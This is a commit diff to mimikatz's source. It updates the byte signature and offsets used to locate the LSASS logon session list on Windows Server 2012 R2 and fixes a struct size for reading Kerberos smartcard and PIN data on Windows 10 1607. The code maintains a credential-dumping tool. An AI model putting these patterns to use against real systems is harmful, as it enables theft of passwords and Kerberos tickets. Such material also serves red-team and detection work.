[fix #65] mimikatz sekurlsa::* for old 2012r2 version
[fix #66] mimikatz sekurlsa::kerberos CSP/Pin data for Windows 10 1607
This commit is contained in:
parent
3ea0f0d11f
commit
57f4101567
|
@ -32,7 +32,7 @@
|
||||||
#define MIMIKATZ_VERSION L"2.1"
|
#define MIMIKATZ_VERSION L"2.1"
|
||||||
#define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
|
#define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
|
||||||
#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__)
|
#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__)
|
||||||
#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\" - CQURE Edition"
|
#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\""
|
||||||
#define MIMIKATZ_SPECIAL L" "
|
#define MIMIKATZ_SPECIAL L" "
|
||||||
#define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
|
#define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
|
||||||
#define MIMIKATZ_DRIVER L"mimidrv"
|
#define MIMIKATZ_DRIVER L"mimidrv"
|
||||||
|
|
|
@ -9,7 +9,7 @@
|
||||||
BYTE PTRN_WIN5_LogonSessionList[] = {0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8};
|
BYTE PTRN_WIN5_LogonSessionList[] = {0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8};
|
||||||
BYTE PTRN_WN60_LogonSessionList[] = {0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84};
|
BYTE PTRN_WN60_LogonSessionList[] = {0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84};
|
||||||
BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84};
|
BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84};
|
||||||
BYTE PTRN_WN63_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xfb, 0x45, 0x85, 0xc0, 0x74};
|
BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05};
|
||||||
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
|
||||||
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
|
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
|
||||||
|
@ -17,7 +17,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
|
||||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_LogonSessionList), PTRN_WN60_LogonSessionList}, {0, NULL}, {21, -4}},
|
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_LogonSessionList), PTRN_WN60_LogonSessionList}, {0, NULL}, {21, -4}},
|
||||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LogonSessionList), PTRN_WN61_LogonSessionList}, {0, NULL}, {19, -4}},
|
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LogonSessionList), PTRN_WN61_LogonSessionList}, {0, NULL}, {19, -4}},
|
||||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
||||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {24, -4}},
|
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {36, -6}},
|
||||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
|
||||||
};
|
};
|
||||||
#elif defined _M_IX86
|
#elif defined _M_IX86
|
||||||
|
|
|
@ -292,7 +292,7 @@ const KERB_INFOS kerbHelper[] = {
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3),
|
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3),
|
||||||
},
|
},
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
|
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
|
||||||
sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
|
sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607),
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName),
|
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName),
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName),
|
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName),
|
||||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),
|
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),
|
||||||
|
|
Loading…
Reference in New Issue